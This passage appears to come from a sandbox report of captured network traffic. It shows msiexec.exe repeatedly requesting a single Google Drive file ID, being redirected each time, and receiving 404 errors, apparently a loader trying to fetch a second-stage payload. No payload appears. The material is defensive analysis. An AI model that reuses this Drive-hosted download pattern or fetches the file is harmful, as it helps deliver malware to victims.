2025-01-10 14:45:41 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgRN0cwsj3FUUKmQmwP71COfVyoi6F0xtaP3CI_cOZ7GOyW4Vs7WIp-X25GXx5akau8HVVzEfUM Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:41 GMT Content-Security-Policy: script-src 'nonce-rT59B8WfDSBiVvGLh_8XoQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-10 14:45:41 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 32 56 47 4d 78 76 41 4b 73 69 31 50 47 75 75 65 54 55 63 4f 54 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2VGMxvAKsi1PGuueTUcOTg">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	57089	142.250.184.238	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:42 UTC	421	OUT	GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
2025-01-10 14:45:42 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:42 GMT Location: https://drive.usercontent.google.com/download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-H-6FBqMTnA0dcmv0TI1TOQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	57090	142.250.185.65	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:43 UTC	463	OUT	GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
2025-01-10 14:45:44 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgSXrwKRoOqPl4CB2RlFmPJNOQsqJLoF0E0ZQaWwrwcedMwyaVXfESSmSIbgTQaJZcBvVJng6_I Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:43 GMT Content-Security-Policy: script-src 'nonce-WGyD_e7H0bbv6N7FvIU4XA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-10 14:45:44 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2d 6a 65 4c 78 75 37 64 65 71 7a 6a 48 46 52 74 6e 4d 4a 2d 6b 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="-jeLxu7deqzjHFRtnMJ-kA">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	57091	142.250.184.238	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:44 UTC	421	OUT	GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
2025-01-10 14:45:45 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:45 GMT Location: https://drive.usercontent.google.com/download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-4F0oUmf8yIqU4Tqn6DvMLw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.6	57092	142.250.185.65	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:45 UTC	463	OUT	GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
2025-01-10 14:45:46 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgRo59NbKQJw-_9ZOHN8AfRgSaOtEzPN3q1UsbsgeOwVLi8mYZ9uxaTW2SYyaaJS4S7B26xe7uo Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:46 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'nonce-l7J4jj96iu_0j946Oxw1tQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-10 14:45:46 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 73 67 55 52 4e 51 61 61 79 5f 77 47 4b 5a 6a 41 31 63 62 68 35 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="sgURNQaay_wGKZjA1cbh5g">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.6	57093	142.250.184.238	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:47 UTC	421	OUT	GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
2025-01-10 14:45:47 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:47 GMT Location: https://drive.usercontent.google.com/download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-9dl629krJN1TLXUXBu7eJQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	57094	142.250.185.65	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:48 UTC	463	OUT	GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
2025-01-10 14:45:48 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgSaiIs0zbAQMhy4Ips-bMtrCicORjtn_SS1kE8_P5VGt-xQ231l-pUQtAxbF_Zefzdd Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:48 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'nonce-af3_tJ45qllWU-iYta-lOQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-10 14:45:48 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 74 72 79 34 66 41 59 68 57 71 73 5f 79 50 2d 51 6d 72 76 73 77 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="try4fAYhWqs_yP-Qmrvsww">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	57095	142.250.184.238	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:49 UTC	421	OUT	GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
2025-01-10 14:45:49 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:49 GMT Location: https://drive.usercontent.google.com/download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-N-Wz74a7uf8rfp4VAR47kQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.6	57096	142.250.185.65	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:50 UTC	463	OUT	GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
